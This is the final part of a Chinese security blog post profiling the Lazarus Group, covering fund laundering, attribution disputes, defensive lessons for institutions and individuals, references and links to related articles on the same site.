<li>链上分析公司 Chainalysis、Elliptic 持续追踪，部分被盗资金至今仍在”沉睡”等待变现。</li>
</ul>
<blockquote>
<p>这解释了为什么 Lazarus 如此执着于加密货币——<strong>在传统金融体系里，朝鲜的每一笔钱都可能被冻结；而在链上，只要技术够强，钱就是自己的。</strong></p>
</blockquote>
<hr>
<h2 id="六、归因与争议"><a href="#六、归因与争议" class="headerlink" title="六、归因与争议"></a>六、归因与争议</h2><p>Lazarus 的归因比”双熊”更复杂，但也更”坐实”：</p>
<ul>
<li><strong>美国</strong>：FBI、CISA、财政部联合多次公开归因，2018 年起诉一名朝鲜程序员朴镇赫（Park Jin Hyok），并对其发布通缉令。</li>
<li><strong>多国共识</strong>：索尼、WannaCry、孟加拉央行、Axie Infinity 等事件均获美英澳等多国联合归因。</li>
<li><strong>朝鲜官方</strong>：一贯全面否认，称指控是”美国的抹黑”。</li>
</ul>
<p><strong>核心争议</strong>：归因的主要证据来自<strong>恶意软件代码复用、C2 基础设施、时间规律、以及被盗资金的流向</strong>，而非直接”抓到人”。对普通读者而言，需要理解的是——<strong>APT 归因本质上是一种”高置信度的指控”，而非司法意义上的定罪。</strong></p>
<hr>
<h2 id="七、对行业与个人的启示"><a href="#七、对行业与个人的启示" class="headerlink" title="七、对行业与个人的启示"></a>七、对行业与个人的启示</h2><h3 id="对机构的启示"><a href="#对机构的启示" class="headerlink" title="对机构的启示"></a>对机构的启示</h3><ol>
<li><strong>金融系统的信任假设需要重估</strong>：孟加拉央行事件证明，”报文正确”不等于”意图合法”，跨行清算需要行为基线与异常拦截。</li>
<li><strong>加密货币不是法外之地，但防护很弱</strong>：跨链桥、DeFi 协议是当下最脆弱的攻击面，代码审计与权限分离必须前置。</li>
<li><strong>供应链是终极后门</strong>：3CX 事件提醒我们，你信任的软件可能已被”污染”。</li>
<li><strong>社工是 Lazarus 的头号武器</strong>：招聘流程、HR 数据、员工社交关系都需要纳入安全边界。</li>
</ol>
<h3 id="对个人的启示"><a href="#对个人的启示" class="headerlink" title="对个人的启示"></a>对个人的启示</h3><ul>
<li>对来路不明的”高薪远程 offer”保持警惕，尤其是要求下载”面试软件”的。</li>
<li>不运行来源不明的 PDF、安装包、浏览器插件。</li>
<li>大额加密资产使用<strong>冷钱包 + 多签</strong>，不将私钥存于联网设备。</li>
</ul>
<hr>
<h3 id="7-5-检测建议：与本站技术系列的联动"><a href="#7-5-检测建议：与本站技术系列的联动" class="headerlink" title="7.5 检测建议：与本站技术系列的联动"></a>7.5 检测建议：与本站技术系列的联动</h3><p>本文涉及的多项技术，本站已有对应的深度拆解，可配合阅读：</p>
<table>
<thead>
<tr>
<th>本文技术点</th>
<th>延伸阅读</th>
</tr>
</thead>
<tbody><tr>
<td>木马免杀与载荷投递</td>
<td>免杀技术系列（Base64&#x2F;ROT13&#x2F;反沙箱&#x2F;MSF）</td>
</tr>
<tr>
<td>无文件后门、内存驻留</td>
<td>《Mistic 后门 BOF 动态扩展》</td>
</tr>
<tr>
<td>加密通信与字节码操作</td>
<td>《安全工具开发：加密通信与字节码操作》</td>
</tr>
<tr>
<td>社工开盒与信息收集</td>
<td>社工系列（开盒思路、手机号归属地查询工具链）</td>
</tr>
</tbody></table>
<blockquote>
<p>Lazarus 的”社工 + 免杀 + 内存驻留 + 洗钱”链条，几乎每一环都能在本站找到对应的防御或复现文章——这也是将”攻击者视角”转化为”防御者能力”的最佳路径。</p>
</blockquote>
<hr>
<h2 id="八、结语：一支为钱而生的网络军队"><a href="#八、结语：一支为钱而生的网络军队" class="headerlink" title="八、结语：一支为钱而生的网络军队"></a>八、结语：一支为钱而生的网络军队</h2><p>Lazarus 是当代网络安全版图上最独特的存在——它把<strong>国家情报机构的纪律性</strong>与<strong>犯罪集团的逐利性</strong>结合在了一起。</p>
<blockquote>
<p>俄罗斯”双熊”偷的是<strong>情报</strong>，伊朗”小猫”偷的是<strong>影响力</strong>，而 Lazarus 偷的是<strong>钱</strong>——因为对一个被制裁封锁的国家而言，每一美元外汇，都是政权延续的血液。</p>
</blockquote>
<p>它的故事远未结束。只要制裁存在，Lazarus 的”提款机”就不会停止运转。</p>
<hr>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>参考资料</h2><ul>
<li>FBI &#x2F; CISA：Hidden Cobra 系列联合警报</li>
<li>Chainalysis &#x2F; Elliptic：Lazarus 加密货币盗窃追踪报告</li>
<li>美国司法部：Park Jin Hyok 起诉书（2018）</li>
<li>Mandiant：APT38 &#x2F; Bluenoroff 深度报告</li>
<li>CrowdStrike、Kaspersky、Symantec：Lazarus 相关技术分析</li>
</ul>
<hr>
<p><em>本文基于公开资料整理撰写，仅供网络安全研究与教育目的使用，不构成任何安全或法律建议。</em></p>
<hr>
<h2 id="相关文章"><a href="#相关文章" class="headerlink" title="相关文章"></a>相关文章</h2><p>本文是「黑客组织」系列的一员：</p>
<ul>
<li><a target="_blank" rel="noopener" href="https://zapcoman.github.io/2026/08/14/20260814/2026081402/">《黑客组织 俄罗斯”双熊”：APT29 舒适熊与 APT28 奇幻熊深度解析》</a> —— 同为国家级 APT：谍报型黑客的典型样本</li>
<li><a target="_blank" rel="noopener" href="https://zapcoman.github.io/2026/08/19/20260819/2026081902/">《黑客组织 - Charming Kitten：伊朗”魅惑小猫”的情报窃取与舆论操盘》</a> —— 国家级 APT 的另一极：情报窃取</li>
<li><a target="_blank" rel="noopener" href="https://zapcoman.github.io/2026/08/19/20260819/2026081903/">《黑客组织 - APT41：当”国家间谍”与”网络黑产”合二为一》</a> —— 国家背景 + 逐利动机的混合体</li>
<li><a target="_blank" rel="noopener" href="https://zapcoman.github.io/2026/08/19/20260819/2026081918/">《黑客组织 - 海莲花 OceanLotus：南海暗涌中的”跨平台幽灵”》</a> —— 南海方向的长期潜伏</li>
<li><a target="_blank" rel="noopener" href="https://zapcoman.github.io/2026/07/16/2026071601/">《黑客组织 - 散落蜘蛛：从赌场勒索到赫尔辛基机场逮捕》</a> —— 现代网络犯罪集团的崛起样本</li>
</ul>
<hr>

  </div>

  <footer class="article-reactions">
    <div class="reaction-group">
      <button type="button" class="reaction reaction--comment" aria-label="跳转到评论区" data-action="scroll-to-comments">
        
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-message-circle flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-message-circle"></use></svg>

      </button>
      <span class="reaction-label">评论</span>
      
    </div>
    <div class="reaction-group reaction-group--right">
      
      <button type="button" class="reaction reaction--share" aria-label="分享" data-action="share">
        
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-share-2 flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-share-2"></use></svg>

      </button>
      <span class="reaction-label">分享</span>
    </div>
  </footer>

  


  <nav class="article-actions">
    
      <a class="article-action article-action--prev" href="/2026/08/19/20260819/2026081902/">
        
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-arrow-left flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-arrow-left"></use></svg>

        <span class="action-label">上一篇</span>
        <span class="action-title">黑客组织 - Charming Kitten：伊朗&#34;魅惑小猫&#34;的情报窃取与舆论操盘</span>
      </a>
    
    
      <a class="article-action article-action--next" href="/2026/08/17/2026081701/">
        <span class="action-label">下一篇</span>
        <span class="action-title">传呼机阴谋：摩萨德如何把口袋里的通讯设备变成炸弹</span>
        
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-arrow-right flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-arrow-right"></use></svg>

      </a>
    
  </nav>
</article>
</div>

<button type="button" class="back-to-top" data-action="scroll-to-top" aria-label="返回顶部" hidden>
  
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-arrow-up flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-arrow-up"></use></svg>

</button>


  <section class="related-paper">
    <header class="related-paper__head">
      <h2>
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-link flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-link"></use></svg>
相关文章</h2>
      <a class="related-paper__more" href="/archives/">
        <span>查看更多</span>
        
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-arrow-right flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-arrow-right"></use></svg>

      </a>
    </header>
    <div class="related-paper__grid">
      
        <a class="related-card" href="/2026/08/19/20260819/2026081906/">
          <span class="related-card__thumb">
            
<div class="paper-thumb paper-thumb-0 paper-thumb--cover">
  
    <img class="paper-thumb__img" src="/../../images/20260819/2026081906-revil.png" alt="黑客组织 - REvil：勒索软件&#34;元老&#34;的疯狂与覆灭" loading="lazy" referrerpolicy="no-referrer">
  
</div>

          </span>
          <span class="related-card__body">
            <strong class="related-card__title">黑客组织 - REvil：勒索软件&#34;元老&#34;的疯狂与覆灭</strong>
            <em class="related-card__date">2026-08-19</em>
          </span>
        </a>
      
        <a class="related-card" href="/2026/08/19/20260819/2026081905/">
          <span class="related-card__thumb">
            
<div class="paper-thumb paper-thumb-1 paper-thumb--cover">
  
    <img class="paper-thumb__img" src="/../../images/20260819/2026081905-lockbit.png" alt="黑客组织 - LockBit：勒索软件即服务的&#34;工业帝国&#34;兴衰史" loading="lazy" referrerpolicy="no-referrer">
  
</div>

          </span>
          <span class="related-card__body">
            <strong class="related-card__title">黑客组织 - LockBit：勒索软件即服务的&#34;工业帝国&#34;兴衰史</strong>
            <em class="related-card__date">2026-08-19</em>
          </span>
        </a>
      
        <a class="related-card" href="/2026/08/19/20260819/2026081903/">
          <span class="related-card__thumb">
            
<div class="paper-thumb paper-thumb-2 paper-thumb--cover">
  
    <img class="paper-thumb__img" src="/../../images/20260819/2026081903-apt41.png" alt="黑客组织 - APT41：当&#34;国家间谍&#34;与&#34;网络黑产&#34;合二为一" loading="lazy" referrerpolicy="no-referrer">
  
</div>

          </span>
          <span class="related-card__body">
            <strong class="related-card__title">黑客组织 - APT41：当&#34;国家间谍&#34;与&#34;网络黑产&#34;合二为一</strong>
            <em class="related-card__date">2026-08-19</em>
          </span>
        </a>
      
        <a class="related-card" href="/2026/08/19/20260819/2026081902/">
          <span class="related-card__thumb">
            
<div class="paper-thumb paper-thumb-0 paper-thumb--cover">
  
    <img class="paper-thumb__img" src="/../../images/20260819/2026081902-charming-kitten.png" alt="黑客组织 - Charming Kitten：伊朗&#34;魅惑小猫&#34;的情报窃取与舆论操盘" loading="lazy" referrerpolicy="no-referrer">
  
</div>

          </span>
          <span class="related-card__body">
            <strong class="related-card__title">黑客组织 - Charming Kitten：伊朗&#34;魅惑小猫&#34;的情报窃取与舆论操盘</strong>
            <em class="related-card__date">2026-08-19</em>
          </span>
        </a>
      
    </div>
  </section>


      


    </section>
    
  </main>

  <div class="sidebar-backdrop js-sidebar-close" aria-hidden="true"></div>

  
<footer class="site-footer">
  <span class="site-footer__left">© 2026 By ZapcoMan</span>
  
    <span class="site-footer__right">
      
        <span class="site-footer__row"><span class="site-footer__powered-prefix">Powered by Theme</span> <a href="https://github.com/Homulilly/hexo-theme-flatpaper" target="_blank" rel="noopener">FlatPaper</a></span>
      
    </span>
  
</footer>

  
<div class="search-panel" aria-hidden="true" data-index-url="/flatpaper-search.json">
  <div class="search-backdrop js-search-close"></div>
  <section class="search-dialog" role="dialog" aria-modal="true" aria-label="搜索文章">
    <span class="tape tape--top-left" aria-hidden="true"></span>
    <header class="search-head">
      <h2><span class="green-dot"></span>搜索文章</h2>
      <button class="icon-button js-search-close" type="button" aria-label="关闭搜索">
        
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-x flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-x"></use></svg>

      </button>
    </header>
    <label class="search-field">
      
<svg xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="none" stroke="currentColor" stroke-width="1.8" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-search flatpaper-icon flatpaper-icon--lucide" aria-hidden="true"><use href="#flatpaper-icon-lucide-search"></use></svg>

      <input id="flatpaper-search" class="search-input" type="search" placeholder="输入关键词，按 Esc 关闭" autocomplete="off">
    </label>
    <div class="search-results" data-empty="输入关键词后显示匹配的文章">
      <p class="search-empty">输入关键词后显示匹配的文章</p>
    </div>
  </section>
</div>

  <script>
  window.FLATPAPER_I18N = {"language":"zh-CN","common.posts":"文章","common.categories":"分类","common.tags":"标签","common.comments":"评论","common.share":"分享","common.page":"页面","common.archive":"归档","common.post_list":"文章列表","common.search_posts":"搜索文章","common.random_posts":"随机文章","common.reward":"赞赏","common.view_all":"查看全部","pagination.prev":"上一页","pagination.next":"下一页","pagination.post_pager":"文章分页","pagination.archive_pager":"归档分页","index.featured":"精选文章","index.pinned":"置顶","index.read_more":"阅读全文","index.previous_slide":"上一张","index.next_slide":"下一张","index.carousel_pagination":"轮播页码","index.carousel_slide":"第 %d 张","index.latest_posts":"最新文章","index.empty_posts":"还没有文章。创建第一篇文章后，这里会显示最新内容。","archive.title":"归档","archive.post_list":"文章列表","taxonomy.category_count":"%d 篇","taxonomy.empty_categories":"暂时还没有分类。","taxonomy.empty_tags":"暂时还没有标签。","links.label":"友链","links.title":"友情链接","links.empty_data":"暂未加载到友链数据。请确认 source/_data/links.yml 存在并已 hexo clean。","links.rss_label":"%s 的 RSS","friends_feed.label":"朋友圈","friends_feed.title":"友链朋友圈","friends_feed.loading":"正在加载友链动态…","friends_feed.missing_url":"暂未配置 all.json 地址。","friends_feed.load_failed":"友链动态加载失败，请稍后再试。","friends_feed.empty":"暂时没有抓取到友链文章。","friends_feed.load_more":"加载更多","friends_feed.updated_at":"更新于 %s","friends_feed.friend_count":"%d 位友邻","friends_feed.active_count":"%d 位活跃","friends_feed.article_count":"%d 篇文章","friends_feed.unknown_author":"未知站点","friends_feed.date_unknown":"时间未知","post.scroll_to_comments":"跳转到评论区","post.previous":"上一篇","post.next":"下一篇","post.no_previous":"没有更早的文章了","post.no_next":"已经是最新的一篇","post.back_to_top":"返回顶部","post.related_posts":"相关文章","post.view_more":"查看更多","not_found.label":"页面走丢了","not_found.title":"找不到这个页面","not_found.text":"这个地址可能已经移动、删除，或者从未存在。","not_found.home":"返回首页","not_found.search":"搜索文章","search.placeholder":"输入关键词，按 Esc 关闭","search.empty":"输入关键词后显示匹配的文章","search.loading":"正在加载搜索索引…","search.load_failed":"搜索索引加载失败，请重新打开搜索重试","search.no_result":"没有找到与 \"%s\" 相关的文章","search.close":"关闭搜索","code.copy":"复制代码","code.collapse":"折叠代码","code.expand":"展开代码","heading.anchor":"链接到此节: %s","head.tag":"标签：%s","head.category":"分类：%s","head.archive":"归档","head.archive_with_date":"归档：%s","head.page_number":"第 %d 页","navigation.primary":"主导航","navigation.mobile":"移动端导航","navigation.brand_home":"FlatPaper 首页","navigation.brand_menu":"打开站点导航","navigation.open_sidebar":"打开侧边栏","navigation.close_sidebar":"关闭侧边栏","navigation.sidebar":"侧边栏","navigation.sidebar_tools":"侧边栏工具","navigation.site_links":"站点链接","navigation.site_info":"站点信息","colors.choose_theme_color":"选择主题色","colors.theme_color":"主题色","colors.toggle_color_mode":"切换颜色模式","colors.green":"绿色","colors.purple":"紫色","colors.pink":"粉色","colors.sakura":"樱花粉","colors.blue":"蓝色","colors.orange":"橙色","colors.black":"黑色","profile.default_bio":"热爱生活，热爱代码，喜欢分享技术与生活中的点滴。","welcome.cta":"开始阅读","welcome.title":"欢迎来到 FlatPaper","welcome.text":"一个专注于内容与阅读体验的博客主题。","home_hero.label":"首页开屏","home_hero.enter":"开始阅读","home_hero.note":"今日","home_hero.default_subtitle":"日常记录","home_hero.nav_links":"开屏导航","home_hero.profile_links":"个人链接","home_hero.tools":"开屏工具","home_hero.shuffle_stickers":"打乱贴纸位置","home_hero.link":"链接","home_hero.sticker_image":"贴纸图片","home_hero.visit_confirm":"要访问 %s 吗？","home_hero.visit":"访问","home_hero.cancel":"取消","toc.title":"文章目录","toc.empty":"目录会根据文章标题自动生成。","toc.expand_all":"展开全部目录","toc.collapse_all":"收起全部目录","sidebar.hot_tags":"热门标签","sidebar.latest_posts":"最新文章"};
  </script>
  
<script src="/js/main.js"></script>

  
</body>
</html>
